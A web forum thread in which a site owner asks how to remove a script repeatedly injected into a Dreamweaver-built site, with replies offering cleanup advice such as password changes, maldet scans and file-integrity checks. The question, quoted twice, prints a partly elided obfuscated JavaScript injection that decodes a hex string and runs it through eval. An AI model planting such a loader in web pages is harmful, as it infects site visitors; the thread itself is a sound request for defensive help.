website has kryptic trojan - how do I remove

[dkchapuis]

A website that is built in dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with eset and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


Here is the script that gets added to each page.

Code JavaScript:

<!--0242d5--><script type="text/javascript" language="javascript" >
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
.......
7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->

any help would be appreciated.

[TechnoBear]

I can't help with finding the source, but if you change your file permissions to read only, it might help to stop them being altered while you track it down.

[xhtmlcoder]

Perhaps you could try the http://www.bleepingcomputer.com/ Security forums since you haven't located the infection vector. Also change your passwords.

[dklynn]

A website that is built in dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with eset and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


Here is the script that gets added to each page.

Code JavaScript:

<!--0242d5--><script type="text/javascript" language="javascript" >
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
.......
7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->

any help would be appreciated.

dk

Your problem is that you have a breach in your security so (repeat of an earlier post):

1. Immediatly delete all FTP access except one (master for the account).

2. Change the master password (cPanel and FTP) to a VERY STRONG one using an http://strongpasswordgenerator.com password of sufficient length.

3. Use maldet scans (on an Apache server) which find and report all forms of malware (viruses, worms and SCRIPTS which can cause problems). This will enable you to find and remove scripts which can be embedded in html, php and js scripts. Repeat the maldet scans until there are no files detected then add a CRON to run maldet scans on a regular basis. Be aware that recovery will primarily consist of DELETING all html, php and js files and replacing them with originals (from your master copies).

4. Additionally, I use a script (via CRON) to verify that files have remain unchanged over the last xx hours for "peace of mind."

5. Database: If you are running WordPress or the like (database verification for admin accounts), create a new admin and delete all other admin records.

6. Update all "canned scripts" (e.g., WP, Zencart, etc.) and be sure that they're kept updated in order to prevent further attacks via security problems discovered in those scripts. This includes their third party plug-ins, too.

7. Uploaded files: Be sure to do a thorough check of any file uploaded to your website (I limit uploaded files to images and they are resized by GD before being saved to my "webspace").

Both staff members suggestions are good but too limited in scope. What you're allowing with JS like this is a barrage of SPAM being sent from your account. If you fail to close the security breach, your host should suspend your account then, failing application of good security, TERMINATE your account for breach of T&C (spamming).

Regards,

DK